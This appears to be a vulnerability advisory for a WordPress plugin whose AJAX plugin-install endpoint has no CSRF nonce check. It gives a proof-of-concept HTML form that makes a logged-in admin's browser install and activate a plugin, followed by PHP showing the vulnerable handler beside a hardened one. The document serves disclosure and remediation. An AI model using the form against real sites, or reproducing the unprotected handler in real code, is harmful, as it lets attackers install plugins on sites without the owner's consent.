The plugin performs no CSRF (nonce) check when installing and activating plugins. An attacker who lures a logged-in administrator to a page under their control can therefore make the admin's browser install an arbitrary plugin from WordPress.org and activate an arbitrary plugin already present on the blog, without the admin intending either action.
Proof of concept: make a logged-in admin open a page containing the HTML form below (the admin only has to submit the form; no nonce or other anti-CSRF token is required by the endpoint).
<!-- Cross-site POST to the plugin's admin-ajax handler; note that no nonce parameter is sent -->
<form action="https://example.com/wp-admin/admin-ajax.php?action=install_plugin" method="POST">
<!-- slug of the plugin to fetch and install from WordPress.org -->
<input type="text" name="slug" value="hello-dolly">
<!-- plugin file (relative to wp-content/plugins) to activate -->
<input type="text" name="plugin" value="hello-dolly/hello.php">
<input type="submit" name="submit" value="submit">
</form>
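The root cause is a missing nonce check on the AJAX handler. The sketch below is an added example, not the affected plugin's code: it shows a hypothetical handler for the `install_plugin` action in its vulnerable shape next to a hardened version. The function names, the hook name `wp_ajax_install_plugin` and the `nonce` request parameter are assumptions; the WordPress functions called (`check_ajax_referer`, `current_user_can`, `plugins_api`, `Plugin_Upgrader`, `activate_plugin`) are real core APIs.

```php
<?php
// Added example (hypothetical, not the affected plugin's code). Assumed names:
// vulnerable_install_plugin(), fixed_install_plugin(), hook 'wp_ajax_install_plugin',
// POST parameters 'slug', 'plugin' and 'nonce'.

/**
 * VULNERABLE shape: the request parameters are consumed directly. Because the
 * victim is a logged-in admin, a capability check alone would not help either;
 * the browser attaches the session cookie to the cross-site POST, so the PoC
 * form above is all an attacker needs. (Left unhooked on purpose.)
 */
function vulnerable_install_plugin() {
    $slug   = isset( $_POST['slug'] ) ? sanitize_key( $_POST['slug'] ) : '';
    $plugin = isset( $_POST['plugin'] ) ? sanitize_text_field( wp_unslash( $_POST['plugin'] ) ) : '';

    install_and_activate( $slug, $plugin ); // no nonce, no capability check
}

/**
 * FIXED shape: reject the request unless it carries a nonce that the plugin's
 * own admin page issued, then enforce the capabilities the action needs.
 */
function fixed_install_plugin() {
    // 1. CSRF defence. The admin page must have embedded
    //    wp_create_nonce( 'install_plugin' ) and the plugin's JS must send it as
    //    the 'nonce' parameter; check_ajax_referer() terminates the request
    //    (response "-1", HTTP 403) when the nonce is missing or invalid.
    check_ajax_referer( 'install_plugin', 'nonce' );

    // 2. Authorisation. A valid nonce proves intent, not privilege, so still
    //    require the capabilities that installing and activating plugins need.
    if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $slug   = isset( $_POST['slug'] ) ? sanitize_key( $_POST['slug'] ) : '';
    $plugin = isset( $_POST['plugin'] ) ? sanitize_text_field( wp_unslash( $_POST['plugin'] ) ) : '';
    if ( '' === $slug || '' === $plugin ) {
        wp_send_json_error( 'missing slug or plugin', 400 );
    }

    $result = install_and_activate( $slug, $plugin );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( $result->get_error_message(), 500 );
    }
    wp_send_json_success( array( 'slug' => $slug, 'plugin' => $plugin ) );
}
add_action( 'wp_ajax_install_plugin', 'fixed_install_plugin' );

/**
 * Shared install/activate logic using core's upgrader; returns true or WP_Error.
 */
function install_and_activate( $slug, $plugin ) {
    include_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    include_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    include_once ABSPATH . 'wp-admin/includes/plugin.php';

    // Resolve the download URL for the slug on WordPress.org.
    $api = plugins_api( 'plugin_information', array( 'slug' => $slug ) );
    if ( is_wp_error( $api ) ) {
        return $api;
    }

    $upgrader  = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $installed = $upgrader->install( $api->download_link );
    if ( is_wp_error( $installed ) ) {
        return $installed;
    }

    // activate_plugin() returns null on success and WP_Error on failure.
    $activated = activate_plugin( $plugin );
    return is_wp_error( $activated ) ? $activated : true;
}
```

To verify a fix from the attacker's side, resubmit the PoC form: with the hardened handler the response is `-1` with HTTP 403 and no plugin is installed, because the cross-site form cannot obtain the nonce that only the plugin's own admin page renders for the logged-in user.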